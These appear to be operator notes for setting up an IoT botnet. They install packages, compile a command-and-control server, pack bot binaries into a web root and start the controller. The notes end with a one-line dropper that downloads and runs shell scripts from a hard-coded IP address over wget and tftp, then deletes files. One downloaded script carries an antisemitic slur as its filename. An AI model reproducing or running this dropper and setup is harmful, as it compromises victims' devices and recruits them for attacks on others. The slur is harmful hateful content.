yum install deltarpm

yum install httpd
yum install iptables


yum install python-paramiko nano screen gcc perl wget lbzip unzip -y

gcc c7.c -o cnc -pthread

python compile.py

chmod 777 *

./upx --ultra-brute /var/www/html/*

screen ./cnc 4258 1 55555
            
NOW PRESS CRTL A+D

LOGIN WITH PUTTY RAW PORT = SCREENPORT





cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.210.186.195/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 192.210.186.195 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.210.186.195; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
